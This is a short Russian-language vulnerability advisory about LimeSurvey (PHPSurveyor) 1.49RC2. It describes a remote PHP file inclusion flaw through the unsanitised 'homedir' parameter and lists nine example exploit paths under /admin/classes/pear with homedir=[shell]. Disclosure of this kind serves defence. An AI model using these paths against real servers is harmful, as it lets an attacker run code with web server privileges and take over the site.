Программа: LimeSurvey (PHPSurveyor) 1.49RC2
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «homedir» различными сценариями. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
/admin/classes/pear/OLE/PPS/File.php?homedir=[shell]
/admin/classes/pear/OLE/PPS/Root.php?homedir=[shell]
/admin/classes/pear/Spreadsheet/Excel/Writer.php?homedir=[shell]
/admin/classes/pear/OLE/PPS.php?homedir=[shell]
/admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php?homedir=[shell]
/admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php?homedir=[shell]
/admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php?homedir=[shell]
/admin/classes/pear/Spreadsheet/Excel/Writer/Format.php?homedir=[shell]
/admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php?homedir=[shell]
